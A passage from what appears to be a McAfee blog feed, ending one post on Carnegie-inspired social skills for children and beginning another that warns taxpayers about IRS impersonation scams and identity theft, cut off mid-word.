Carnegie wrote his book during the Great Depression, when the practice of optimism and simple truths was critical to a person’s hope. So, some perspectives will feel odd or passé. But stick with it. Savor and apply the gems and enjoy the process of deepening your digital connections.

The post Timeless Principles to Help Your Child Develop Social Superpowers appeared first on McAfee Blogs.

Watch Out For IRS Scams and Avoid Identity Theft

It’s time to get those W-2 and 1099 tax forms ready. On January 27th, the IRS began accepting paper and electronic tax returns ahead of the April 15th due date. But as users prepare to file, scammers prepare to take advantage of innocent taxpayers with malicious tactics, looking to harvest the extensive amounts of personal data found in IRS tax documents. Let’s take a look at common tactics hackers may leverage this tax season.

Impersonation Schemes

A commonl